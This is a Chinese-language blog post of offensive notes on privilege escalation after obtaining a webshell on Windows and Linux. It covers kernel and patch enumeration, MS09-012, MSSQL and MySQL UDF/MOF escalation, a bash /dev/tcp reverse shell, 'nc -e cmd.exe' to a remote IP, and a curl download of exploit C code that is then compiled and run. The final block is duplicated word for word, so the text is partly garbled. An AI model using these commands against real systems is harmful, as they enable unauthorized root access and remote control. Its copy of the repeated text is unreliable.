windows和linux提權
阿新 • • 發佈:2019-02-20
前提:拿到wbshell後做的事情webshell 通常繼承了web 使用者的許可權通常情況下,web使用者的許可權是比較低的 許可權提升1:獲取其他使用者的訪問許可權,甚至是管理員。 ! 水平許可權提升(越權)(普通使用者更改普通使用者的帖子) 對一個論壇來說 : 超級管理員(管理所有)、版主(管理一版的帖子)、普通使用者(管裡自己的帖子) A|B !垂直許可權提升(更改版主或超級管理員的貼子) !如果以上兩種情況,發生在web、App中 失效的訪問控制:就是未對通過身份驗證的使用者實施恰當的訪問控制。攻擊者可以利用這些缺陷訪問未經授權的功能或資料,例如:訪問其他使用者的賬戶、檢視敏感檔案、修改其他使用者的資料、更改訪問許可權等。對於系統來說,就是“提權”,目標是獲取root/administrator的許可權。提權的分類: 水平許可權提升、垂直許可權提升依據作業系統分類:編譯器: windows系統:提權方式: 作業系統漏洞提權: 步驟:1獲取系統資訊 命令是:systminfo 根據沒有修補的補丁號碼,直接在網上找 利用程式 網址:www.7kb.org/138.html 漏洞(系統漏洞msxx-xx)與補丁(kB)的對應關係 PR提權:win2003 MS09-012 巴西烤肉提權 2 直接用exp,exp就是編譯好的針對某一漏洞的exe程式 第三方服務提權 就是資料庫提權 分兩種:1:MSSQL 提取 關鍵步驟:就是獲取sa使用者的密碼 條件:資料庫的埠、地址 sa sa使用者的密碼 2::MYSQL 提權 分兩種:1:UDF 提權 2:MOF提權 其他資料庫 VNC PCanywhere .........linux系統:自帶的編譯器:gcc 1:利用系統漏洞進行提權 一;瞭解目標作業系統的核心版本號,去查詢對應的能提權的漏洞 命令:• cat /proc/version(系統版本資訊) • uname -a(核心查詢) • uname -mrs+- • rpm -q kernel • dmesg | grep Linux
• ls /boot | grep vmlinuz 1;shell反彈 監聽埠 nc.exe -lvvp 4444 /bin/bash -i >& /dev/tcp/ip地址/4444(埠號) 0<&1
查詢提權的漏洞 kali中:searchsploit+系統
下載提權exp.c curl http://172.18.199.91/35370.c > exp.c 編譯並且執行 gcc exp.c -o exploit -lpthread ./exploit提權實戰1 如果對方windows系統,並且使用套件搭建服務,獲取的webshell,即是system許可權 常見的套件: xampp wamp phpstudy內網滲透1 nc shell 反彈 客戶端首先執行 nc.exe -lvvp 777(埠號) 伺服器端執行 nc.exe -e cmd.exe 遠端IP地址 埠號
• ls /boot | grep vmlinuz 1;shell反彈 監聽埠 nc.exe -lvvp 4444 /bin/bash -i >& /dev/tcp/ip地址/4444(埠號) 0<&1
查詢提權的漏洞 kali中:searchsploit+系統
下載提權exp.c curl http://172.18.199.91/35370.c > exp.c 編譯並且執行 gcc exp.c -o exploit -lpthread ./exploit提權實戰1 如果對方windows系統,並且使用套件搭建服務,獲取的webshell,即是system許可權 常見的套件: xampp wamp phpstudy內網滲透1 nc shell 反彈 客戶端首先執行 nc.exe -lvvp 777(埠號) 伺服器端執行 nc.exe -e cmd.exe 遠端IP地址 埠號